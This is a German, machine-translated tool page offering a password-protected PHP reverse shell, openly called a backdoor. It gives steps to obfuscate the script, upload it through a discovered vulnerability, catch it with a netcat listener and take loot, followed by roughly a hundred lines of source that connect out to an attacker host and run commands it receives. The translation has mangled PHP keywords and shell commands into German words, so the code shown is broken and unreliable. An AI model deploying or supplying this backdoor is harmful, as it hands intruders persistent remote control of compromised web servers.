Reverse-Shell v1.0 PHP – Authentication Funktion
Product By:
Ashfaq Ansari
Version:
1.0
Preis:
Kostenlos

Bewertet von:
Wertung:
5
Auf Oktober 9, 2012
Zuletzt geändert:Januar 18, 2013

Zusammenfassung:

Reverse-Verbindung PHP Shell mit eingebauten Funktion zur Authentifizierung. Ehrfürchtig Skript auf Ihren Hintertür schützen.

Einführung

 

Dieses Tool ist für Pentest Situation, wo Sie Upload auf einen Webserver, auf denen PHP haben Zugriff konzipiert.
Laden Sie dieses Skript irgendwo im Web-Root führen Sie es durch den Zugriff auf die entsprechende URL in Ihrem Browser. Das Skript wird eine ausgehende TCP-Verbindung vom Webserver zu öffnen, um einen Host und Port im Skript definiert. Gebunden an diese TCP-Verbindung wird eine Schale sein.
 

Das wird eine richtige interaktive Shell, in dem Sie Programme wie interective laufen kann Telnet und SSH.
Diese Schale hat eine eingebaute Funktion zur Authentifizierung, die jemand anderes verhindert missbrauchen Ihre Hintertür.
Es unterscheidet sich von Web-Formular-basierte Schale, mit dem Sie einen einzelnen Befehl senden, dann kehren Sie die Ausgabe.
 

Ändern Sie die Quelle

 

1
2
3
$ip = "127.0.0.1"; #Ändern Sie dies in Ihrer öffentlichen IP
$Port = 4444;      #Ändern Sie dies in Ihrem Hafen
$Kennwort = base64_decode("aGFja3N5c3RlYW0="); #Standard-Passwort: hacksysteam (MD5)

 

Ändern Sie die Werte nach Ihren Bedarf und Situation.
 

Obfuscate The Source

 

Nachdem Sie die Änderung vorgenommen, Sie können jeden beliebigen Online PHP Obfuscator auf das PHP-Skript codieren.
 

Beispiel: http://www.codeeclipse.com/
 

Bevor verschleiern, ändern Sie bitte die oben genannten Werte nach Ihren Bedürfnissen.
 

Setup-Netcat Listener

 

Starten Sie eine Netcat Zuhörer auf einem Host und Port, die vom Web-Server.
Verwenden Sie den gleichen Port hier, wie Sie angegeben in umgekehrter Shell-Skript zum Beispiel (4444):
 

1
root @ bt:~ # nc -lvvp 4444

 

Laden Sie das Skript und führen Sie es aus

 

Über die Sicherheitslücke entdeckt, die Sie in der Website, laden reverse_shell.php.
Führen Sie das Skript einfach, indem Sie auf die neu hochgeladenen Datei in Ihrem Web-Browser.
 

1
http://<Victim IP>/<Pfad hochladen>/reverse_shell.php

 

Hinweis: Sie sehen keinen Ausgang auf der Web-Seite, es weiterhin in Wartemodus, wenn seine erfolgreiche.
 

Loot mit Shell

 

Source Code

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
<?php
###################################################
#               Umkehren Shell v1.0 #
#             Authentication Feature #
#                                                 #
#            Hacksys Teams - Panthera #
#             Verfasser: Ashfaq Ansari #
#            hacksysteam@hotmail.com #
#          http://hacksys.vfreaks.com #
#              Für Linux #
#             Dank lionaneesh #
#             lionaneesh@gmail.com #
###################################################

ini_set('Max_execution_time',0);

$VERSION = "1.0";
$ip = "127.0.0.1"; #Ändern Sie diese
$Port = 4444;      #Ändern Sie diese
$Kennwort = base64_decode(&quot;aGFja3N5c3RlYW0="); #Standard-Passwort: hacksysteam (MD5)

$banner = ("
 _ _ _ _____
| |  | |          | |   / ____|                            
| |__| | __ _ ___| | _| (___ _ _ ___
|  __|/ _ ` |/ __| |/ /\___ \| | | / __|
| |  | | (_| | (__|   < ____) | |_| \__ \
|_|  |_|\__,_|\___|_|\_ _____ / __, |___ /
 _______ __ / |                                
|__ __|                      |___ /
   | | ___ __ _ _ __ ___
   | |/ _ \/ _ ` | '_ `_ \
   | |  __ / (_| | | | | | |
   |_|\___|\__,_|_| |_| |_|
   
    Umkehren Shell in PHP
    Verfasser: Ashfaq Ansari
   hacksysteam@hotmail.com
 http://hacksys.vfreaks.com /\n\n"
);

$pwd = shell_exec("Pwd");
$sysinfo = shell_exec("Uname-a");
$id = shell_exec('Id | cut-d "(" -f 2 | cut-d ")" -f 1 ');
$Datum = shell_exec("Datum");
$lediglich = 1337;
$info =
("
System Information:\n$sysinfo
Aktuelle Working Directory: $pwd
User Group: $id
Aktuelles Datum und Uhrzeit: $Datum\n
"
);

drucken "\nDer Versuch, eine Verbindung herstellen: $ip auf Port $Port ...\n\n";

$sockfd = fsockopen($ip , $Port , $errno, $errstr );

wenn($errno != 0)
  {
    drucken "\n****** Fehler aufgetreten ******\nFehler nAnzahl: $errno\nFehler String: $errstr\n\n";
    die(0);
  }
sonst wenn (!$sockfd)
  {
    drucken "Fatal : Ein unerwarteter Fehler ist aufgetreten war beim Versuch, eine Verbindung!\n";
  }
sonst
  {
    drucken "Verbunden: $ip auf Port $Port ...\n\n";
    fputs ($sockfd , $banner);
    fputs($sockfd ,"Geben Sie das Passwort: ");
    $getpass = trimmen(fgets($sockfd, strlen($Kennwort) + 2));

    wenn ($getpass == $Kennwort)
    {
      fputs($sockfd, "\nAuthentifizierung erfolgreich..\n");
      fputs($sockfd, $info);
      während(!EOF($sockfd))
      {
    $cmdPrompt = trimmen($id) . "@" . trimmen($ip) . ":~" . trimmen($pwd) . "# ";
    fputs ($sockfd , $cmdPrompt );
    $Befehl = trimmen(fgets($sockfd, $lediglich));
        wenn (trimmen($Befehl) == "Verlassen")
    {
      fputs($sockfd ,"\nDurch Benutzer abgebrochen ... Verlassen ..." );
      fclose($sockfd);
      die(0);
    }
    fputs($sockfd , "\n" . shell_exec($Befehl) . "\n");
      }
      fclose($sockfd);
      die(0);
    }
    sonst
    {
      fputs($sockfd ,"\nInvalid Password ... Beenden ...");
      fclose($sockfd);
      die(0);
    }
  }
?>

 

Screenshot

 


 

Herunterladen Reverse Shell v1.0 PHP – Authentication Funktion

 

Reverse_Shell_v1.0.zip

 
 
 

21,002 Ansichten, 10 von heute

Die folgenden zwei Registerkarten wechseln Gehalt unter.

Ashfaq Ansari

Sicherheit Researcher
Ashfaq Ansari ist der Gründer von HackSys Teams Codenamen "Panthera". Er ist ein Sicherheitsexperte mit Erfahrung in verschiedenen Aspekten der Informationssicherheit. Er ist Autor "HackSys Extreme Vulnerable Treiber" und "Shellcode of Death". Er hat auch geschrieben und veröffentlicht verschiedene Whitepapers auf niedrigem Niveau Software Ausbeutung. Seine Kern Interesse liegt in "Low Level Exploitation", "Reverse Engineering", "Program Analysis" und "Hybrid Fuzzing". Er ist ein fanboy der Künstlichen Intelligenz und maschinelles Lernen. Er ist das Kapitel für Blei null Pune.

Einen Kommentar schreiben

Ihre E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind markiert *